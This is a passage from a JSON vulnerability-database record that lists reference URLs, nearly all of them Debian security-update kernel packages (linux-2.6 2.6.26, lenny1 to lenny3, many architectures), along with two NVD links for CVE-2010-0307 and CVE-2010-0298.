        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-486_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-orion5x_2.6.26-21lenny2_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-doc-2.6.26_2.6.26-21lenny2_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-s390_2.6.26-21lenny3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-powerpc64_2.6.26-21lenny3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-alpha-smp_2.6.26-21lenny3_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-r5k-ip32_2.6.26-21lenny2_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-i386_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-openvz-686_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-manual-2.6.26_2.6.26-21lenny2_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny2_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-686-bigmem_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-tree-2.6.26_2.6.26-21lenny2_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-r4k-ip22_2.6.26-21lenny3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-686-bigmem_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-686-bigmem_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-mckinley_2.6.26-21lenny3_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-arm_2.6.26-21lenny2_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-xen-686_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-parisc-smp_2.6.26-21lenny3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny3_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny2_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny2_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.26-21lenny2.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-mckinley_2.6.26-21lenny3_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-21lenny2_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.26-2-xen-686_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny3_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-powerpc64_2.6.26-21lenny3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-xen_2.6.26-21lenny3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-iop32x_2.6.26-21lenny1_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-s390_2.6.26-21lenny3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-alpha-legacy_2.6.26-21lenny2_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-4kc-malta_2.6.26-21lenny2_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-iop32x_2.6.26-21lenny3_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-itanium_2.6.26-21lenny3_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-686-bigmem_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sb1a-bcm91480b_2.6.26-21lenny2_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-orion5x_2.6.26-21lenny3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-21lenny1_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-amd64_2.6.26-21lenny3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sb1a-bcm91480b_2.6.26-21lenny3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-alpha-smp_2.6.26-21lenny3_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-686_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-openvz-686_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-parisc64_2.6.26-21lenny2_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-xen-amd64_2.6.26-21lenny2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-alpha-generic_2.6.26-21lenny2_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-amd64_2.6.26-21lenny3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-686_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-versatile_2.6.26-21lenny1_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-486_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-s390_2.6.26-21lenny1_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-parisc64-smp_2.6.26-21lenny3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny3_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-iop32x_2.6.26-21lenny3_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-itanium_2.6.26-21lenny1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-s390-tape_2.6.26-21lenny3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-footbridge_2.6.26-21lenny2_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-alpha-smp_2.6.26-21lenny2_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-openvz-686_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-source-2.6.26_2.6.26-21lenny3_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-686_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-s390_2.6.26-21lenny2_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-amd64_2.6.26-21lenny3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-5kc-malta_2.6.26-21lenny3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny3_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sparc64-smp_2.6.26-21lenny3_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.26-21lenny1.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-manual-2.6.26_2.6.26-21lenny1_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-patch-debian-2.6.26_2.6.26-21lenny1_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-parisc64_2.6.26-21lenny2_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-mckinley_2.6.26-21lenny1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-source-2.6.26_2.6.26-21lenny2_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-r5k-ip32_2.6.26-21lenny3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-openvz-686_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-alpha-generic_2.6.26-21lenny3_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-parisc64-smp_2.6.26-21lenny2_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sb1-bcm91250a_2.6.26-21lenny3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-5kc-malta_2.6.26-21lenny2_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sb1-bcm91250a_2.6.26-21lenny3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-amd64_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny2_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-21lenny2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-5kc-malta_2.6.26-21lenny3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-openvz-amd64_2.6.26-21lenny3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny3_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-21lenny3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-doc-2.6.26_2.6.26-21lenny3_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sparc64_2.6.26-21lenny3_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-sparc64_2.6.26-21lenny2_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-mipsel_2.6.26-21lenny3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny2_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny2_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny3_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-orion5x_2.6.26-21lenny2_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sparc64-smp_2.6.26-21lenny1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-r5k-cobalt_2.6.26-21lenny2_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-686_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-alpha_2.6.26-21lenny3_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.26-21lenny3.diff.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny3_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny2_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-iop32x_2.6.26-21lenny3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-sparc64_2.6.26-21lenny3_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-xen-686_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-ixp4xx_2.6.26-21lenny3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-21lenny3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-686_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-parisc64_2.6.26-21lenny3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-xen-686_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sparc64-smp_2.6.26-21lenny2_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.26-2-xen-686_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-powerpc_2.6.26-21lenny3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-powerpc-smp_2.6.26-21lenny3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sb1a-bcm91480b_2.6.26-21lenny3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.26-2-xen-amd64_2.6.26-21lenny2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-sparc_2.6.26-21lenny2_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.26-21lenny3.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-686_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-openvz_2.6.26-21lenny3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.26-21lenny1.diff.gz"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0307"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-alpha-legacy_2.6.26-21lenny3_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-s390x_2.6.26-21lenny1_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-21lenny1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-xen_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-powerpc64_2.6.26-21lenny3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-s390x_2.6.26-21lenny1_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny1_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-s390x_2.6.26-21lenny2_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-ixp4xx_2.6.26-21lenny3_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-s390_2.6.26-21lenny1_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-openvz-686_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0298"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-versatile_2.6.26-21lenny3_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-mips_2.6.26-21lenny3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-686_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny3_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-686_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-tree-2.6.26_2.6.26-21lenny3_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-hppa_2.6.26-21lenny2_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sparc64_2.6.26-21lenny2_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-ixp4xx_2.6.26-21lenny2_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-5kc-malta_2.6.26-21lenny2_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-686_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-s390x_2.6.26-21lenny3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-i386_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-xen-686_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.26-2-xen-686_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-686-bigmem_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-mckinley_2.6.26-21lenny3_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-s390x_2.6.26-21lenny2_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny1_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-486_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
